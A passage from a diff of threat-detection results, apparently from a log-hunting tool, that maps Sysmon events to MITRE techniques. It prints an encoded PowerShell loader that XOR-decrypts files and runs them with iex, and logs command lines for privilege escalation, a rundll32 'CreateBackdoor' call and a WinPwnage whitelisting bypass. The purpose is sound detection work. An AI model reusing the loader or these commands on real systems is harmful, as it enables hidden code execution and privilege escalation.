JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564834103.555174,2019-08-03T16:08:23.555174+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-08-03T12:08:23.554778Z"">
+    </TimeCreated>
+    <EventRecordID>5452</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2780"" ThreadID=""3676"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-08-03 12:08:23.391</Data>
+    <Data Name=""ProcessGuid"">747F3D96-7937-5D45-0000-00100D290801</Data>
+    <Data Name=""ProcessId"">4192</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4E9-5D45-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-7934-5D45-0000-0010CAB90701</Data>
+    <Data Name=""ParentProcessId"">7564</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\consent.exe</Data>
+    <Data Name=""ParentCommandLine"">consent.exe 896 272 00000280644BC500</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1589069378.023663,2020-05-10T04:09:38.023663+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-05-10T00:09:36.709454Z"">
+    </TimeCreated>
+    <EventRecordID>112969</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2728"" ThreadID=""3432"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-05-10 00:09:36.703</Data>
+    <Data Name=""ProcessGuid"">747F3D96-4640-5EB7-0000-0010EF364B01</Data>
+    <Data Name=""ProcessId"">372</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">c:\Windows\System32\cmd.exe</Data>
+    <Data Name=""CurrentDirectory"">c:\Users\IEUser\Tools\PrivEsc\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-3B92-5EB5-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-4640-5EB7-0000-0010292D4B01</Data>
+    <Data Name=""ParentProcessId"">8028</Data>
+    <Data Name=""ParentImage"">C:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe</Data>
+    <Data Name=""ParentCommandLine"">NetworkServiceExploit.exe  -i -c &quot;c:\Windows\System32\cmd.exe&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1584766817.998461,2020-03-21T09:00:17.998461+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:17.997235Z"">
+    </TimeCreated>
+    <EventRecordID>243516</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:17.518</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-00109B6C1E00</Data>
+    <Data Name=""ProcessId"">6620</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766817.998461,2020-03-21T09:00:17.998461+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:17.997235Z"">
+    </TimeCreated>
+    <EventRecordID>243516</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:17.518</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-00109B6C1E00</Data>
+    <Data Name=""ProcessId"">6620</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( &quot;C:\Windows\System32\rundll32.exe&quot; zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T13:58:54.897009Z"">
+    </TimeCreated>
+    <EventRecordID>16443</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2036"" ThreadID=""296"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 13:58:54.772</Data>
+    <Data Name=""ProcessGuid"">365ABB72-269E-5CD8-0000-001084F81A00</Data>
+    <Data Name=""ProcessId"">2728</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-2523-5CD8-0000-00204C360100</Data>
+    <Data Name=""LogonId"">0x1364c</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-268F-5CD8-0000-0010F4A51700</Data>
+    <Data Name=""ParentProcessId"">1256</Data>
+    <Data Name=""ParentImage"">C:\Python27\python.exe</Data>
+    <Data Name=""ParentCommandLine"">python  winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1584766817.998461,2020-03-21T09:00:17.998461+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:17.997235Z"">
+    </TimeCreated>
+    <EventRecordID>243516</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:17.518</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-00109B6C1E00</Data>
+    <Data Name=""ProcessId"">6620</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T13:58:54.897009Z"">
+    </TimeCreated>
+    <EventRecordID>16443</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2036"" ThreadID=""296"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 13:58:54.772</Data>
+    <Data Name=""ProcessGuid"">365ABB72-269E-5CD8-0000-001084F81A00</Data>
+    <Data Name=""ProcessId"">2728</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-2523-5CD8-0000-00204C360100</Data>
+    <Data Name=""LogonId"">0x1364c</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-268F-5CD8-0000-0010F4A51700</Data>
+    <Data Name=""ParentProcessId"">1256</Data>
+    <Data Name=""ParentImage"">C:\Python27\python.exe</Data>
+    <Data Name=""ParentCommandLine"">python  winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T13:58:54.897009Z"">
+    </TimeCreated>
+    <EventRecordID>16443</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2036"" ThreadID=""296"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 13:58:54.772</Data>
+    <Data Name=""ProcessGuid"">365ABB72-269E-5CD8-0000-001084F81A00</Data>
+    <Data Name=""ProcessId"">2728</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-2523-5CD8-0000-00204C360100</Data>
+    <Data Name=""LogonId"">0x1364c</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-268F-5CD8-0000-0010F4A51700</Data>
+    <Data Name=""ParentProcessId"">1256</Data>
+    <Data Name=""ParentImage"">C:\Python27\python.exe</Data>
+    <Data Name=""ParentCommandLine"">python  winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\System32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-11T17:28:22.598305Z"">
+    </TimeCreated>
+    <EventRecordID>16040</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2008"" ThreadID=""1992"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
